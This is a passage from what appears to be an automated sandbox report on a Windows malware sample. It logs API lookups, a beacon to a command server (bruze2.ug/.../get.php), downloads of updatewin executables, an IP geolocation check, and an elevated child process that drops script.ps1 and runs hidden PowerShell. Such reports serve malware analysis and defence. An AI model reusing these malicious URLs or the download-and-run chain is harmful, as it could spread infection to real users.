Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74a99263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x749d572c True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x749c436b True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x7491c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathA, address_out = 0x760e7804 True 1
Fn
Service (2)
»
Operation Additional Information Success Count Logfile
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create LPCWSTRszTitle class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
System (257)
»
Operation Additional Information Success Count Logfile
Sleep duration = 40000 milliseconds (40.000 seconds) True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Get Time type = System Time, time = 2019-07-19 06:57:29 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 16325952109 True 1
Fn
Get Time type = Ticks, time = 106096 True 34
Fn
Get Time type = Ticks, time = 106111 True 120
Fn
Get Time type = Ticks, time = 106127 True 95
Fn
Get Time type = System Time, time = 2019-07-19 06:57:30 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 16433537186 True 1
Fn
Get Time type = System Time, time = 2019-07-19 06:57:35 (UTC) True 1
Fn
Get Info type = Operating System True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (8)
»
Information Value
Total Data Sent 1.21 KB
Total Data Received 834.00 KB
Contacted Host Count 2
Contacted Hosts 77.123.139.189, 47.252.0.194
HTTP Session #1
»
Information Value
User Agent Microsoft Internet Explorer
Server Name bruze2.ug
Server Port 80
Username -
Password -
Data Sent 180 bytes
Data Received 307 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = bruze2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /ASd3457oHOIUSDhfsuft33i76t21/95898398498ihsdfasd/get.php True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://bruze2.ug/ASd3457oHOIUSDhfsuft33i76t21/95898398498ihsdfasd/get.php?pid=0E11F5E4125223A10BC64F8C25940F2B&first=true True 1
Fn
Read Response size = 1024, size_out = 103 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
User Agent Microsoft Internet Explorer
Server Name bruze2.ug
Server Port 80
Username -
Password -
Data Sent 104 bytes
Data Received 272.77 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = bruze2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /files/penelop/updatewin1.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://bruze2.ug/files/penelop/updatewin1.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 2560 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #3
»
Information Value
User Agent Microsoft Internet Explorer
Server Name bruze2.ug
Server Port 80
Username -
Password -
Data Sent 104 bytes
Data Received 274.77 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = bruze2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /files/penelop/updatewin2.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://bruze2.ug/files/penelop/updatewin2.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 4608 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #4
»
Information Value
User Agent Microsoft Internet Explorer
Server Name bruze2.ug
Server Port 80
Username -
Password -
Data Sent 103 bytes
Data Received 277.77 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = bruze2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /files/penelop/updatewin.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://bruze2.ug/files/penelop/updatewin.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Read Response size = 10240, size_out = 10240 True 27
Fn
Data
Read Response size = 10240, size_out = 7680 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #5
»
Information Value
User Agent Microsoft Internet Explorer
Server Name bruze2.ug
Server Port 80
Username -
Password -
Data Sent 95 bytes
Data Received 407 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = bruze2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /files/penelop/3.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://bruze2.ug/files/penelop/3.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
HTTP Session #6
»
Information Value
User Agent Microsoft Internet Explorer
Server Name bruze2.ug
Server Port 80
Username -
Password -
Data Sent 95 bytes
Data Received 407 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = bruze2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /files/penelop/4.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://bruze2.ug/files/penelop/4.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
HTTP Session #7
»
Information Value
User Agent Microsoft Internet Explorer
Server Name bruze2.ug
Server Port 80
Username -
Password -
Data Sent 95 bytes
Data Received 407 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = http, server_name = bruze2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /files/penelop/5.exe True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://bruze2.ug/files/penelop/5.exe True 1
Fn
Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
HTTP Session #8
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.19 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 465 True 1
Fn
Data
Close Session - True 1
Fn
Process #6: updatewin1.exe
671 0
»
Information Value
ID #6
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:51, Reason: Child Process
Unmonitor End Time: 00:00:53, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0xa00
Parent PID 0x9a4 (c:\users\5p5nrgjn0js halpmcxz\desktop\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A04
0x A0C
0x A10
0x A14
0x A18
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
updatewin1.exe 0x00400000 0x0044CFFF Relevant Image - 32-bit - False False
buffer 0x00315000 0x00315FFF Marked Executable - 32-bit - False False
updatewin1.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False False
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000300000:+0x16795 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000850000:+0x71f6f6
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe show_window = SW_SHOW True 1
Fn
Module (154)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x74900000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe base_address = 0x400000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x7491c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-19 06:57:37 (UTC) True 2
Fn
Get Time type = Ticks, time = 113958 True 1
Fn
Get Time type = Performance Ctr, time = 17193262808 True 1
Fn
Get Time type = Ticks, time = 113989 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = Performance Ctr, time = 17218381088 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #7: updatewin1.exe
670 0
»
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe" --Admin
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\
Monitor Start Time: 00:00:52, Reason: Child Process
Unmonitor End Time: 00:01:05, Reason: Self Terminated
Monitor Duration 00:00:12
OS Process Information
»
Information Value
PID 0xa1c
Parent PID 0xa00 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A20
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x00585000 0x00585FFF Marked Executable - 32-bit - False False
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000570000:+0x1679d 104. entry of updatewin1.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x00000000009d0000:+0x59f6f6
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 49 bytes MD5: f972c62f986b5ed49ad7713d93bf6c9f
SHA1: 4e157002bdb97e9526ab97bfafbf7c67e1d1efbf
SHA256: b47f85974a7ec2fd5aa82d52f08eb0f6cea7e596a98dd29e8b85b5c37beca0a8
SSDeep: 3:uIHeGAFcX5wTnl:/eGgHTl
False
Host Behavior
File (8)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\script.ps1 size = 49 True 1
Fn
Data
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create powershell os_pid = 0xa24, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (150)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x74900000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
